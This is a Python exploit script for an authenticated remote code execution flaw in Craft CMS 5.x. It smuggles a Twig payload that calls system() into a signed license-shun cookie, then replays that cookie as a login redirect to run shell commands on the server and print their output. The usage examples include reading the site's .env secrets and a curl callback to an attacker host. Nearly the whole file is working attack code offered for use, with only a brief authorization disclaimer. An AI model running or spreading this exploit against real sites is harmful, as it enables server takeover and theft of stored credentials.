#!/usr/bin/env python3
"""
Craft CMS authenticated RCE helper for GHSA-5r92-75j8-c534.

The issue affects Craft CMS >= 5.0.0, < 5.10.13 and abuses a signed cookie
generated by the license shun endpoint as a trusted redirect parameter.
Use only on systems you are authorized to test.



MADE BY MNESTRASHNO - MN3STRASHN0
"""

import argparse
import getpass
import json
import os
import re
import sys
from html import unescape
from urllib.parse import unquote, urljoin

import requests
from requests import RequestException


def die(message):
    print(f"[-] {message}", file=sys.stderr)
    sys.exit(1)


def request(session, method, url, **kwargs):
    headers = kwargs.pop("headers", {})
    headers.setdefault("User-Agent", "Mozilla/5.0")
    timeout = kwargs.pop("timeout", session.request_timeout)
    try:
        return session.request(method, url, headers=headers, timeout=timeout, **kwargs)
    except RequestException as exc:
        die(f"{method} {url} failed: {exc}")


def csrf_from_text(session, text):
    patterns = [
        r'name=["\']CRAFT_CSRF_TOKEN["\']\s+value=["\']([^"\']+)',
        r'value=["\']([^"\']+)["\']\s+name=["\']CRAFT_CSRF_TOKEN["\']',
        r'"csrfTokenValue"\s*:\s*"([^"]+)"',
    ]
    for pattern in patterns:
        match = re.search(pattern, text)
        if match:
            return unescape(match.group(1))

    cookie = session.cookies.get("CRAFT_CSRF_TOKEN")
    if cookie and "|" in cookie:
        return cookie.split("|", 1)[0]
    return cookie


def csrf(session, base_url):
    response = request(session, "GET", urljoin(base_url, "/admin/login"))
    token = csrf_from_text(session, response.text)
    if not token:
        die("could not obtain CSRF token")
    return token


def login(session, base_url, username, password, redirect=None, accepts_json=True):
    token = csrf(session, base_url)
    data = {
        "CRAFT_CSRF_TOKEN": token,
        "loginName": username,
        "password": password,
        "rememberMe": "1",
    }
    if redirect is not None:
        data["redirect"] = redirect

    headers = {"X-CSRF-Token": token, "X-Requested-With": "XMLHttpRequest"}
    if accepts_json:
        headers["Accept"] = "application/json"

    return request(
        session,
        "POST",
        urljoin(base_url, "/index.php?p=admin/actions/users/login"),
        data=data,
        headers=headers,
        allow_redirects=False,
    )


def logout(session, base_url):
    token = csrf(session, base_url)
    request(
        session,
        "POST",
        urljoin(base_url, "/index.php?p=admin/actions/users/logout"),
        data={"CRAFT_CSRF_TOKEN": token},
        headers={
            "Accept": "application/json",
            "X-CSRF-Token": token,
            "X-Requested-With": "XMLHttpRequest",
        },
        allow_redirects=False,
    )


def sign_payload_cookie(session, base_url, twig):
    token = csrf(session, base_url)
    response = request(
        session,
        "POST",
        urljoin(base_url, "/index.php?p=admin/actions/app/set-license-shun-cookie"),
        data={"CRAFT_CSRF_TOKEN": token, "hash": twig},
        headers={
            "Accept": "application/json",
            "X-CSRF-Token": token,
            "X-Requested-With": "XMLHttpRequest",
        },
        allow_redirects=False,
    )
    if response.status_code >= 400:
        print(response.text[:1000])
        die(f"set-license-shun-cookie failed with HTTP {response.status_code}")

    candidates = [
        cookie.value
        for cookie in session.cookies
        if "license" in cookie.name.lower() or "shun" in cookie.name.lower()
    ]
    if not candidates:
        print("[!] Cookies:")
        for cookie in session.cookies:
            print(f"    {cookie.name}={cookie.value[:80]}")
        die("could not find signed license shun cookie")

    return unquote(candidates[-1])


def twig_for_command(command):
    escaped = command.replace("\\", "\\\\").replace("'", "\\'")
    return "{{['" + escaped + "']|map('system')|join}}"


def parse_php_serialized_strings(value):
    strings = []
    i = 0
    while i < len(value):
        match = re.search(r's:(\d+):"', value[i:])
        if not match:
            break
        length = int(match.group(1))
        start = i + match.end()

        # PHP string lengths are byte counts. Walk chars until the UTF-8 byte
        # length matches, then expect the closing quote/semicolon.
        byte_len = 0
        end = start
        while end < len(value) and byte_len < length:
            byte_len += len(value[end].encode())
            end += 1

        if byte_len == length and value[end:end + 2] == '";':
            strings.append(value[start:end])
            i = end + 2
        else:
            i = start
    return strings


def command_output_from_response(response):
    try:
        data = response.json()
    except ValueError:
        return None

    redirect = data.get("redirect")
    if not isinstance(redirect, str):
        return None

    match = re.search(r'"hash":"((?:\\.|[^"\\])*)"', redirect, re.S)
    if match:
        try:
            return json.loads(f'"{match.group(1)}"')
        except ValueError:
            return match.group(1)

    for candidate in reversed(parse_php_serialized_strings(redirect)):
        try:
            payload = json.loads(candidate)
        except ValueError:
            continue
        if isinstance(payload, dict) and "hash" in payload:
            return payload["hash"]
    return None


def main():
    parser = argparse.ArgumentParser(
        description="Craft CMS authenticated signed-cookie/redirect RCE helper (GHSA-5r92-75j8-c534)",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""examples:
  python3 solve_craftcms_signed_redirect_rce.py -u http://target.test --user alice --password 'pass' --cmd id
  CRAFT_USER=alice CRAFT_PASSWORD='pass' python3 solve_craftcms_signed_redirect_rce.py -u http://target.test --cmd 'cat .env'
  python3 solve_craftcms_signed_redirect_rce.py -u https://target.test --user alice --insecure --cmd 'curl http://ATTACKER/cb'
""",
    )
    parser.add_argument("-u", "--url", required=True, help="Base URL, e.g. http://target.test")
    parser.add_argument("--user", default=os.getenv("CRAFT_USER"), help="Craft username/login name, or CRAFT_USER")
    parser.add_argument("--password", default=os.getenv("CRAFT_PASSWORD"), help="Craft password, or CRAFT_PASSWORD")
    parser.add_argument("--cmd", default="id", help="Shell command to execute through Twig/system")
    parser.add_argument("--raw-twig", help="Use a raw Twig payload instead of wrapping --cmd")
    parser.add_argument("--timeout", type=float, default=25.0, help="HTTP timeout in seconds")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification")
    parser.add_argument(
        "--raw-response",
        action="store_true",
        help="Print the full Craft JSON/headers instead of extracting command output",
    )
    args = parser.parse_args()

    if not args.user:
        die("provide --user or set CRAFT_USER")
    if not args.password:
        args.password = getpass.getpass("Craft password: ")
        if not args.password:
            die("provide --password or set CRAFT_PASSWORD")

    base_url = args.url.rstrip("/") + "/"
    session = requests.Session()
    session.request_timeout = args.timeout
    session.verify = not args.insecure
    if args.insecure:
        requests.packages.urllib3.disable_warnings()

    response = login(session, base_url, args.user, args.password)
    if response.status_code not in (200, 302, 303):
        print(response.text[:1000])
        die(f"login failed with HTTP {response.status_code}")
    print(f"[+] Logged in as {args.user}")

    twig = args.raw_twig if args.raw_twig else twig_for_command(args.cmd)
    signed_redirect = sign_payload_cookie(session, base_url, twig)
    print(f"[+] Got signed redirect candidate ({len(signed_redirect)} bytes)")

    logout(session, base_url)
    print("[+] Logged out; triggering login with signed redirect")
    response = login(
        session,
        base_url,
        args.user,
        args.password,
        redirect=signed_redirect,
        accepts_json=True,
    )
    print(f"[+] Trigger HTTP {response.status_code}")

    if args.raw_response:
        if response.text.strip():
            print(response.text[:4000])
    else:
        output = command_output_from_response(response)
        if output is None:
            print("[-] Could not extract command output from response")
            if response.text.strip():
                print(response.text[:1200])
        elif output:
            print("\n--- command output ---")
            print(output.rstrip())
            print("--- end ---")
        else:
            print("[+] Command executed; no stdout captured")

    location = response.headers.get("Location")
    if args.raw_response and location:
        print(f"[+] Location: {location[:1000]}")


if __name__ == "__main__":
    main()
